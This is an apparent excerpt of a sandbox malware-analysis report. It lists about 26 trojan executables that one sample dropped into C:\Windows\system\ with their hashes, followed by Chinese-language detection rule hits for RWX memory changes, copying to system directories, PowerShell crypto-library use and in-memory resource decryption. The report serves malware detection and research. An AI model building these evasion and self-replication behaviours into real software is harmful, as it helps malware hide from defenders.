size: 1827174
this_path: /data/cuckoo/storage/analyses/6000053/files/1001/UfmkLek.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 690681b8c58823b453aef30245100acf
name: MaprHdx.exe
new_size: 1784KB (1827427bytes)
operation: 修改文件
path: C:\Windows\system\MaprHdx.exe
processid: 1316
processname: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
sha1: 6b3e03071afb9818b80b81db2d95bf283e39d2a8
sha256: e24e97b04f7651d3a2f15e7cbe95b30d208570e861a33ac94c7056fdd192ad61
size: 1827427
this_path: /data/cuckoo/storage/analyses/6000053/files/1002/MaprHdx.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: b801682b75a03291ace364222f2a63ea
name: JPzdVyd.exe
new_size: 1784KB (1827680bytes)
operation: 修改文件
path: C:\Windows\system\JPzdVyd.exe
processid: 1316
processname: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
sha1: fd59450eea44e393d0619672bfb9d79cfc6dd304
sha256: 7df0a689569029c74adf9ee2c5163cdf9d6d52c947a36f9655590b13ffcf0efd
size: 1827680
this_path: /data/cuckoo/storage/analyses/6000053/files/1003/JPzdVyd.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 81c73c29a62f33f74babbe9f3f348d57
name: KdggEVI.exe
new_size: 1785KB (1827933bytes)
operation: 修改文件
path: C:\Windows\system\KdggEVI.exe
processid: 1316
processname: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
sha1: 4955ebee44d7aaabc8917879df6acbdef249089c
sha256: 0582672c14409c3eb593d0d287309f04faaaf0e1c78887e29a11f0f20cdc62c3
size: 1827933
this_path: /data/cuckoo/storage/analyses/6000053/files/1004/KdggEVI.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: ef43983438ef9d836e34f28ca311779f
name: VwdfFJt.exe
new_size: 1785KB (1828186bytes)
operation: 修改文件
path: C:\Windows\system\VwdfFJt.exe
processid: 1316
processname: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
sha1: a951de2d9fd51db2a74e919dfd18418053f37dc9
sha256: 5f50a731e05a7f45152cbc56dcc47a23d43891fb27614c1ede0dd45e4c9c7064
size: 1828186
this_path: /data/cuckoo/storage/analyses/6000053/files/1005/VwdfFJt.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: cf9feadf79474d3da841e9aec691aa35
name: CRcNZVo.exe
new_size: 1785KB (1828439bytes)
operation: 修改文件
path: C:\Windows\system\CRcNZVo.exe
processid: 1316
processname: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
sha1: abbf5e1dbcb3ebdd255b75451f029bc9e2346ef4
sha256: 783b169cfeaa7d31488aafd6b357af8996ef67a3506254b46b34e462013abb65
size: 1828439
this_path: /data/cuckoo/storage/analyses/6000053/files/1006/CRcNZVo.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 80541ee72db7f89fc1ee06c183ba14ac
name: IXUptjB.exe
new_size: 1785KB (1828692bytes)
operation: 修改文件
path: C:\Windows\system\IXUptjB.exe
processid: 1316
processname: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
sha1: 5bed1a09ab0eb61019c9616e63dfa1d999729519
sha256: ec3bc8b06e25baae7cf3624eb96ad284a1dc749d56e4542ac895f6daa1c60491
size: 1828692
this_path: /data/cuckoo/storage/analyses/6000053/files/1007/IXUptjB.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 85e7bd70e23f1cde06266c4ddb0ea446
name: pIzHgOO.exe
new_size: 1786KB (1828945bytes)
operation: 修改文件
path: C:\Windows\system\pIzHgOO.exe
processid: 1316
processname: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
sha1: 2bea1c6db2343cc4cc3a4b9fca0ee324c39b0af7
sha256: 6814db2b3d846b506449a0532808ac50018488cfb0245b5f73adac13b3f42139
size: 1828945
this_path: /data/cuckoo/storage/analyses/6000053/files/1008/pIzHgOO.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: bc56c59e41a00de77207802325ad1b5d
name: uMjqrEB.exe
new_size: 1786KB (1829198bytes)
operation: 修改文件
path: C:\Windows\system\uMjqrEB.exe
processid: 1316
processname: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
sha1: 7dd875cca55571a7ed842f967f29f2b611879b74
sha256: 975ef5ef27a53089354300cce80999c4305a207669cd404941370f47e2e66e2a
size: 1829198
this_path: /data/cuckoo/storage/analyses/6000053/files/1009/uMjqrEB.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 98b32e38d2d27d6307a9bcd96bac5d00
name: sEgtnBe.exe
new_size: 1786KB (1829451bytes)
operation: 修改文件
path: C:\Windows\system\sEgtnBe.exe
processid: 1316
processname: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
sha1: 92d7fd7a3e9c240ac1e48ee2d8c3fc70d5c4e332
sha256: 655f76b6923a8345053a9b825ba7d8112e5891a821050bbcb087dd1d95305f2b
size: 1829451
this_path: /data/cuckoo/storage/analyses/6000053/files/1010/sEgtnBe.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: d650af0fd8364b27eca706382416b294
name: yZCFVGB.exe
new_size: 1786KB (1829704bytes)
operation: 修改文件
path: C:\Windows\system\yZCFVGB.exe
processid: 1316
processname: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
sha1: c18c3be99214d50a48c479445c5117580d5ffa9a
sha256: 95200f091939139b664a475f0c3da5d961535d1807c0b12e50fbe91618017965
size: 1829704
this_path: /data/cuckoo/storage/analyses/6000053/files/1011/yZCFVGB.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 10092d283b62947fb55cc5aec3230a6f
name: ExdKeaE.exe
new_size: 1787KB (1829957bytes)
operation: 修改文件
path: C:\Windows\system\ExdKeaE.exe
processid: 1316
processname: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
sha1: ca1194a3b9a0f5c3bb5d5b54076f9481359f589e
sha256: 6954713a53dc8474204c2266cf5da48547d3bfdd1529591c9fad32944ad91f5f
size: 1829957
this_path: /data/cuckoo/storage/analyses/6000053/files/1012/ExdKeaE.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: df9119a34f2f5430d95b4f981d7cb8f3
name: bcPoyuc.exe
new_size: 1787KB (1830210bytes)
operation: 修改文件
path: C:\Windows\system\bcPoyuc.exe
processid: 1316
processname: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
sha1: 038b467b326eabd4bb1a35bbc1635fef531a86e9
sha256: 6d192b1e27dfa17c696609bd142e2bc8b2350a66354c0c0224ea65a335c02f03
size: 1830210
this_path: /data/cuckoo/storage/analyses/6000053/files/1013/bcPoyuc.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 18c5ea80694f1eb4f75b7f85a3c0c2b2
name: iBJwesG.exe
new_size: 1787KB (1830463bytes)
operation: 修改文件
path: C:\Windows\system\iBJwesG.exe
processid: 1316
processname: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
sha1: 716c4b7a4c36d99dce67c0fc253599b322d6466c
sha256: 741ae2a4e36de8b8da546c6ab26ac3fc71f636459008ec8002836043c44f684f
size: 1830463
this_path: /data/cuckoo/storage/analyses/6000053/files/1014/iBJwesG.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 34a15ecb28ac49d4713eeeec820de68b
name: MOSoBow.exe
new_size: 1787KB (1830716bytes)
operation: 修改文件
path: C:\Windows\system\MOSoBow.exe
processid: 1316
processname: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
sha1: 452c4743ca2f931fb12aa3fd026c77a23688e3da
sha256: 3c8a72330157b832ec3f5b12d738182f36c033f849d54272c07d0b6e90b5bc88
size: 1830716
this_path: /data/cuckoo/storage/analyses/6000053/files/1015/MOSoBow.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: ddaf374e60cce81fd1dc2c5fa54d90fe
name: IhAbDZN.exe
new_size: 1788KB (1830969bytes)
operation: 修改文件
path: C:\Windows\system\IhAbDZN.exe
processid: 1316
processname: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
sha1: 599abf04670c2d114bb673844798cd3a25d4b6e6
sha256: f8a10e74ea6c425b35aaca21595bc9671db91953b8df6df145981a2d3f4894c2
size: 1830969
this_path: /data/cuckoo/storage/analyses/6000053/files/1017/IhAbDZN.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: a209bf22f3b9843c494565e9fb621857
name: tBgBbnQ.exe
new_size: 1788KB (1831222bytes)
operation: 修改文件
path: C:\Windows\system\tBgBbnQ.exe
processid: 1316
processname: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
sha1: 300f255cc10c2027f96bb78bb917bce1d745162b
sha256: 2fabe4ea9a6d82743c9b207c98cad353355a6499ae0467d3b394288f54bac458
size: 1831222
this_path: /data/cuckoo/storage/analyses/6000053/files/1018/tBgBbnQ.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 4a22faa5425ab42f240b2f5fa76ebaec
name: HvsZicl.exe
new_size: 1788KB (1831475bytes)
operation: 修改文件
path: C:\Windows\system\HvsZicl.exe
processid: 1316
processname: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
sha1: 977ad5c3eca52771219dc7e8c5e4ed79cef27d9e
sha256: c247096e7977ad8a6359525d954397602fd250d3054ab419b54e8078b3dae458
size: 1831475
this_path: /data/cuckoo/storage/analyses/6000053/files/1019/HvsZicl.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: e3f92a44fff344c99db172da62bba356
name: iQKkOox.exe
new_size: 1788KB (1831728bytes)
operation: 修改文件
path: C:\Windows\system\iQKkOox.exe
processid: 1316
processname: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
sha1: 685ed3288f0d699e1b6fb7586ed5153258b849b0
sha256: 7b09267607e9c7b7cb510d5275ab8dd5b09eb7e4f95e312204501e2e7e429f07
size: 1831728
this_path: /data/cuckoo/storage/analyses/6000053/files/1020/iQKkOox.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 2a1b28a37cb077f217858953c910cb29
name: XEOFqKg.exe
new_size: 1789KB (1831981bytes)
operation: 修改文件
path: C:\Windows\system\XEOFqKg.exe
processid: 1316
processname: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
sha1: af9aa13f3bbf2c4dcf234b33e853d6b44f763f3c
sha256: fbb4b0a3c3de767baaa291e29b4521431d0e87eb5e5fcd8a1ab956ab59e33887
size: 1831981
this_path: /data/cuckoo/storage/analyses/6000053/files/1021/XEOFqKg.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 6b5d350f50e8d849b5d50012a7289980
name: NJPyHCi.exe
new_size: 1789KB (1832234bytes)
operation: 修改文件
path: C:\Windows\system\NJPyHCi.exe
processid: 1316
processname: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
sha1: 4bdafaa29ee61a81ea3fbfd3caf417fc8609c5f4
sha256: 594acbf65c4cda8b6e69d303a79851b7d50b057aaa12a371627721b5b7064d01
size: 1832234
this_path: /data/cuckoo/storage/analyses/6000053/files/1022/NJPyHCi.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 3ce75d3ff8065f7de4b42d5b9e6b40d5
name: gfRmnmy.exe
new_size: 1789KB (1832487bytes)
operation: 修改文件
path: C:\Windows\system\gfRmnmy.exe
processid: 1316
processname: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
sha1: 84a2531ac17710520fd8012fe2f62fde8f163b9f
sha256: 5ff821868aa70337260e89bc410bdc1cdf5ac442fd1f4c02885f1bfa472ddc96
size: 1832487
this_path: /data/cuckoo/storage/analyses/6000053/files/1023/gfRmnmy.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 4473f3dd1c4e5dc176bcd4dca12c2da7
name: CAMmSlI.exe
new_size: 1789KB (1832740bytes)
operation: 修改文件
path: C:\Windows\system\CAMmSlI.exe
processid: 1316
processname: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
sha1: 8da59cf54a9671e65b61d6faf46df2b58689ae2d
sha256: ccba5da8b5c276100095678eee93667a5eaef5aa1dd5c9947bcdf0f223243821
size: 1832740
this_path: /data/cuckoo/storage/analyses/6000053/files/1024/CAMmSlI.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: c3ae93f1fe89feb07f77647a122414ba
name: pdXNVaf.exe
new_size: 1790KB (1832993bytes)
operation: 修改文件
path: C:\Windows\system\pdXNVaf.exe
processid: 1316
processname: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
sha1: 989965412ecc9e94381968199b33ea78d5f9f89b
sha256: 6f3126cc547f0adc07f11f844269fd54fb56ca0fec46180b070b7764c64dbfe4
size: 1832993
this_path: /data/cuckoo/storage/analyses/6000053/files/1025/pdXNVaf.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 6d74305a72ffd9373302f7695f3e2576
name: tSxAjyb.exe
new_size: 1790KB (1833246bytes)
operation: 修改文件
path: C:\Windows\system\tSxAjyb.exe
processid: 1316
processname: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
sha1: 763c7965209edb0b4448501fc500b0bcd0c10e49
sha256: 56456f6d6b3f83fb48abdc96a9d12640d9e4f8ca4fefa9ef3633fea88778df83
size: 1833246
this_path: /data/cuckoo/storage/analyses/6000053/files/1026/tSxAjyb.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 71109a01de60f9b2f61f2ef1d022d9dd
name: nbDdSOs.exe
new_size: 1790KB (1833499bytes)
operation: 修改文件
path: C:\Windows\system\nbDdSOs.exe
processid: 1316
processname: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
sha1: bcfe78e80dd950fe84be3ad2d5d638e1884c27af
sha256: ee2e68bba1fa33e6d50decf08a463a956f7cb2fea930672369417b208d537067
size: 1833499
this_path: /data/cuckoo/storage/analyses/6000053/files/1027/nbDdSOs.exe
type: PE32+ executable (console) x86-64, for MS Windows

 Malicious

attck_tactics: 其他恶意行为
level: 1
matchedinfo: 恶意软件通过修改内存属性,以达到在内存中解密&执行恶意代码
num: 292
process_id: 1316
process_name: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
rulename: 修改内存地址为可读可写可执行
attck_tactics: 防御逃逸
level: 2
matchedinfo: 恶意程序通过拷贝文件到系统目录的方式,以达到隐藏恶意文件的目的
num: 396
process_id: 1316
process_name: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
rulename: 拷贝文件到系统目录
attck_tactics: 其他恶意行为
level: 1
matchedinfo: 一般被用于文件的加密、数据的加密传输或可能被用于勒索者病毒中
num: 5337
process_id: 3016
process_name: powershell.exe
rulename: 调用加密算法库
attck_tactics: 其他恶意行为
level: 1
matchedinfo: 恶意软件通过修改内存属性,以达到在内存中解密&执行恶意代码
num: 5526
process_id: 3016
process_name: powershell.exe
rulename: 修改内存地址为可读可写可执行
attck_tactics: 其他恶意行为
level: 2
matchedinfo: 恶意程序通过从资源段释放资源到内存中,进行解密操作
num: 6287
process_id: 3016
process_name: powershell.exe
rulename: 加载资源到内存
attck_tactics: 其他恶意行为
level: 1
matchedinfo: 恶意软件通过修改内存属性,以达到在内存中解密&执行恶意代码
num: 292
process_id: 2928
process_name: xHHrwsJ.exe
rulename: 修改内存地址为可读可写可执行
attck_tactics: 其他恶意行为
level: 1
matchedinfo: 恶意软件通过修改内存属性,以达到在内存中解密&执行恶意代码
num: 292
process_id: 2000
process_name: UfmkLek.exe
rulename: 修改内存地址为可读可写可执行
attck_tactics: 其他恶意行为
level: 1
matchedinfo: 恶意软件通过修改内存属性,以达到在内存中解密&执行恶意代码
num: 292
process_id: 2208
process_name: MaprHdx.exe
rulename: 修改内存地址为可读可写可执行
attck_tactics: 其他恶意行为
level: 1
matchedinfo: 恶意软件通过修改内存属性,以达到在内存中解密&执行恶意代码
num: 292
process_id: 940
process_name: JPzdVyd.exe
rulename: 修改内存地址为可读可写可执行
attck_tactics: 其他恶意行为
level: 1
matchedinfo: 恶意软件通过修改内存属性,以达到在内存中解密&执行恶意代码
num: 292
process_id: 2528
process_name: KdggEVI.exe
rulename: 修改内存地址为可读可写可执行
attck_tactics: 其他恶意行为
level: 1
matchedinfo: 恶意软件通过修改内存属性,以达到在内存中解密&执行恶意代码
num: 292
process_id: 952
process_name: VwdfFJt.exe
rulename: 修改内存地址为可读可写可执行
attck_tactics: 其他恶意行为
level: 1
matchedinfo: 恶意软件通过修改内存属性,以达到在内存中解密&执行恶意代码
num: 292
process_id: 2596
process_name: CRcNZVo.exe
rulename: 修改内存地址为可读可写可执行
attck_tactics: 其他恶意行为
level: 1
matchedinfo: 恶意软件通过修改内存属性,以达到在内存中解密&执行恶意代码
num: 292
process_id: 568
process_name: IXUptjB.exe
rulename: 修改内存地址为可读可写可执行
attck_tactics: 其他恶意行为
level: 1
matchedinfo: 恶意软件通过修改内存属性,以达到在内存中解密&执行恶意代码
num: 292
process_id: 3024
process_name: pIzHgOO.exe
rulename: 修改内存地址为可读可写可执行
attck_tactics: 其他恶意行为
level: 1
matchedinfo: 恶意软件通过修改内存属性,以达到在内存中解密&执行恶意代码
num: 292
process_id: 3044
process_name: uMjqrEB.exe
rulename: 修改内存地址为可读可写可执行
attck_tactics: 其他恶意行为
level: 1
matchedinfo: 恶意软件通过修改内存属性,以达到在内存中解密&执行恶意代码
num: 292
process_id: 1876
process_name: sEgtnBe.exe
rulename: 修改内存地址为可读可写可执行
attck_tactics: 其他恶意行为
level: 1
matchedinfo: 恶意软件通过修改内存属性,以达到在内存中解密&执行恶意代码
num: 292
process_id: 2888
process_name: yZCFVGB.exe
rulename: 修改内存地址为可读可写可执行
attck_tactics: 其他恶意行为
level: 1
matchedinfo: 恶意软件通过修改内存属性,以达到在内存中解密&执行恶意代码
num: 292
process_id: 2200
process_name: ExdKeaE.exe
rulename: 修改内存地址为可读可写可执行
attck_tactics: 其他恶意行为
level: 1
matchedinfo: 恶意软件通过修改内存属性,以达到在内存中解密&执行恶意代码
num: 292
process_id: 256
process_name: bcPoyuc.exe
rulename: 修改内存地址为可读可写可执行
attck_tactics: 其他恶意行为
level: 1
matchedinfo: 恶意软件通过修改内存属性,以达到在内存中解密&执行恶意代码
num: 292
process_id: 1964
process_name: iBJwesG.exe
rulename: 修改内存地址为可读可写可执行
attck_tactics: 其他恶意行为
level: 1
matchedinfo: 恶意软件通过修改内存属性,以达到在内存中解密&执行恶意代码
num: 292
process_id: 2892
process_name: MOSoBow.exe
rulename: 修改内存地址为可读可写可执行
attck_tactics: 其他恶意行为
level: 1
matchedinfo: 恶意软件通过修改内存属性,以达到在内存中解密&执行恶意代码
num: 292
process_id: 2204
process_name: IhAbDZN.exe
rulename: 修改内存地址为可读可写可执行
attck_tactics: 其他恶意行为
level: 1
matchedinfo: 恶意软件通过修改内存属性,以达到在内存中解密&执行恶意代码
num: 292
process_id: 1512
process_name: tBgBbnQ.exe
rulename: 修改内存地址为可读可写可执行
attck_tactics: 其他恶意行为
level: 1
matchedinfo: 恶意软件通过修改内存属性,以达到在内存中解密&执行恶意代码
num: 292
process_id: 2868
process_name: HvsZicl.exe
rulename: 修改内存地址为可读可写可执行
attck_tactics: 其他恶意行为
level: 1
matchedinfo: 恶意软件通过修改内存属性,以达到在内存中解密&执行恶意代码
num: 292
process_id: 2808
process_name: iQKkOox.exe
rulename: 修改内存地址为可读可写可执行
attck_tactics: 其他恶意行为
level: 1
matchedinfo: 恶意软件通过修改内存属性,以达到在内存中解密&执行恶意代码
num: 292
process_id: 676
process_name: XEOFqKg.exe
rulename: 修改内存地址为可读可写可执行
attck_tactics: 其他恶意行为
level: 1
matchedinfo: 恶意软件通过修改内存属性,以达到在内存中解密&执行恶意代码
num: 292
process_id: 2592
process_name: NJPyHCi.exe
rulename: 修改内存地址为可读可写可执行
attck_tactics: 其他恶意行为
level: 1
matchedinfo: 恶意软件通过修改内存属性,以达到在内存中解密&执行恶意代码
num: 292
process_id: 1932
process_name: gfRmnmy.exe
rulename: 修改内存地址为可读可写可执行
attck_tactics: 其他恶意行为
level: 1
matchedinfo: 恶意软件通过修改内存属性,以达到在内存中解密&执行恶意代码
num: 292
process_id: 3052
process_name: CAMmSlI.exe
rulename: 修改内存地址为可读可写可执行
attck_tactics: 其他恶意行为
level: 1
matchedinfo: 恶意软件通过修改内存属性,以达到在内存中解密&执行恶意代码
num: 292
process_id: 2732
process_name: pdXNVaf.exe
rulename: 修改内存地址为可读可写可执行
attck_tactics: 其他恶意行为
level: 1
matchedinfo: 恶意软件通过修改内存属性,以达到在内存中解密&执行恶意代码
num: 292
process_id: 2552
process_name: tSxAjyb.exe
rulename: 修改内存地址为可读可写可执行